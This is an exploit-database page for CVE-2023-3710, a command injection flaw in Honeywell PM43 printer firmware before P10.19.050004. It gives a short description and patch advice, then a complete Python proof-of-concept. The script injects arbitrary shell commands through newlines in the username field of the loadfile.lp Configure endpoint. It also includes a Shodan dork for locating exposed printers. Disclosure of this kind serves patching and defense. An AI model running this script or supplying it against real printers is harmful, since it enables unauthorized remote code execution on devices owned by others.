header-logo
Suggest Exploit
vendor:
PM43 Printers
by:
ByteHunter
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: PM43 Printers
Affected Version From: Prior to P10.19.050004
Affected Version To: Not specified
Patch Exists: YES
Related CWE: CVE-2023-3710
CPE: h:honeywell:pm43_firmware
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

Honeywell PM43 Command Injection Remote Code Execution (RCE)

The exploit allows an attacker to remotely execute arbitrary code on Honeywell PM43 printers with firmware versions prior to P10.19.050004. By sending a crafted payload to the 'loadfile.lp?pageid=Configure' endpoint, an attacker can inject malicious commands. This vulnerability is identified as CVE-2023-3710.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to version P10.19.050004 or later. Additionally, restrict network access to the printer and avoid exposing it directly to the internet.
Source

Exploit-DB raw data:

#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710   
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter      
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text  
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()